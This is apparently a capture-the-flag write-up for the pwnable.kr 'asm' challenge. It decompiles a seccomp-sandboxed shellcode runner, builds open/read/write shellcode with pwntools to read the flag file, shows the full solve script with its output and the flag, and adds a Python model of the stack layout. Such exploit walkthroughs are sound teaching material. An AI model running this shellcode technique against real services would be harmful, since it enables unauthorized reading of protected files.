question

```
Mommy! I think I know how to make shellcodes

ssh asm@pwnable.kr -p2222 (pw: guest)
```
analyse

Dragging the binary into IDA, the decompiled pseudocode shows:
```c
puts("Welcome to shellcoding practice challenge.");
puts("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.");
puts("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.");
puts("If this does not challenge you. you should play 'asg' challenge :)");
s = (char *)mmap((void *)0x41414000, 0x1000uLL, 7, 50, 0, 0LL);   // RWX page at a fixed address
memset(s, 144, 0x1000uLL);                                        // 0x90 = NOP fill
v4 = strlen(stub);
memcpy(s, stub, v4);                                              // fixed prefix, our code follows it
printf("give me your x64 shellcode: ", stub, argv);
read(0, s + 46, 0x3E8uLL);
alarm(0xAu);
chroot("/home/asm_pwn");
sandbox("/home/asm_pwn");                                         // installs the seccomp filter
((void (*)(void))s)();
```
In other words, we have to write our own shellcode that reads the flag. Note that only the three system calls open, read and write are allowed by the sandbox.
The site http://syscalls.kernelgrok.com/ could be used to look up the syscall table, but it seems to be unreachable because of maintenance, so I deployed its GitHub project myself at http://syscall.ycdxsb.cn/
To make writing the shellcode easier, we can use the shellcraft module of pwntools: http://docs.pwntools.com/en/stable/shellcraft/amd64.html
First we need to push the filename onto the stack:
```python
filename = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong'
payload = ''
payload += shellcraft.amd64.pushstr(filename)
```
Because the string was pushed, rsp now points at the filename, so next we use open on it:
```python
payload += shellcraft.amd64.open('rsp', 0, 0)
```
Since shellcraft wraps the syscall for us, the arguments here match those of the real open function.
On x86-64 the return value of a call is left in rax, so after open the file descriptor is in rax. We then use read to load the file contents into the memory rsp points to:
```python
payload += shellcraft.amd64.read('rax', 'rsp', 100)
```
Finally we use write to print the contents at rsp to the screen:
```python
payload += shellcraft.amd64.write(1, 'rsp', 100)
```
get flag

```python
from pwn import *

context(arch='amd64', os='linux')

# p = process('asm')
p = remote('127.0.0.1', 99026)

filename = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong'

payload = ''
payload += shellcraft.amd64.pushstr(filename)        # filename on the stack, rsp -> string
payload += shellcraft.amd64.open('rsp', 0, 0)        # fd returned in rax
payload += shellcraft.amd64.read('rax', 'rsp', 100)  # read file contents over the same buffer
payload += shellcraft.amd64.write(1, 'rsp', 100)     # print 100 bytes from rsp

p.recvuntil('shellcode: ')
p.sendline(asm(payload))
print(p.recv())
```
```
[DEBUG] Received 0x64 bytes:
    'Mak1ng_shelLcodE_i5_veRy_eaSy\n'
    'lease_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooo'
Mak1ng_shelLcodE_i5_veRy_eaSy
lease_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooo
```
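The following is an added example, not code from the original writeup or from pwntools: it models the stack layout that pushstr produces (the string split into 8-byte little-endian chunks, last chunk pushed first, NUL-terminated and padded to a whole qword) and then models why the output above contains the flag followed by a tail of the filename. Because read() and write() both use the buffer at rsp, read() overwrites only as many bytes as the file holds, and the fixed-size write(1, rsp, 100) then emits the rest of the old filename. The filename and flag contents are the values from the writeup; the chunking is a model of the layout, not pwntools' exact instruction selection.

```python
import struct

# Filename taken from the writeup above (the challenge's flag file).
FLAG_FILENAME = "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong"

# Flag file contents as printed in the writeup's output, used here as sample input.
FLAG_CONTENT = b"Mak1ng_shelLcodE_i5_veRy_eaSy\n"


def pushstr_qwords(s: str) -> list:
    """Return the 8-byte little-endian words, in push order, that lay s out
    NUL-terminated on the stack.  The last chunk is pushed first, so after
    all pushes rsp points at the first byte of the string.  This models the
    layout pushstr produces; it is not pwntools' exact code generation."""
    data = s.encode() + b"\0"             # a C string needs its terminator
    data += b"\0" * (-len(data) % 8)      # pad to a whole number of qwords
    words = [struct.unpack("<Q", data[i:i + 8])[0] for i in range(0, len(data), 8)]
    return words[::-1]                    # highest-address chunk is pushed first


def stack_after_pushes(words) -> bytes:
    """Memory from rsp upward after executing the pushes in the given order."""
    mem = b""
    for w in words:                       # each push lowers rsp by 8 and stores w there
        mem = struct.pack("<Q", w) + mem
    return mem


def simulate_open_read_write(filename: str, content: bytes, n: int = 100):
    """Model the three syscalls over the one buffer at rsp:
    read(fd, rsp, n) overwrites the start of the filename with the file
    contents and returns the byte count; write(1, rsp, n) then emits n bytes,
    so everything past the file contents is leftover filename."""
    mem = bytearray(stack_after_pushes(pushstr_qwords(filename)))
    if len(mem) < n:                      # stack beyond the string modelled as zeros
        mem += b"\0" * (n - len(mem))
    got = content[:n]                     # read() stops at end of file
    mem[:len(got)] = got
    return bytes(mem[:n]), len(got)       # (what write() prints, what read() returned in rax)


if __name__ == "__main__":
    out, nread = simulate_open_read_write(FLAG_FILENAME, FLAG_CONTENT)
    print(nread, out)
```

The model reproduces the observed output: read() returns 30 (the flag line), and bytes 30..99 of the printed buffer are the filename from offset 30 onward, which is where "lease_read_this_file..." comes from. Since read() leaves its byte count in rax, writing rax bytes instead of a fixed 100 would print only the file contents.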
flag

Mak1ng_shelLcodE_i5_veRy_eaSy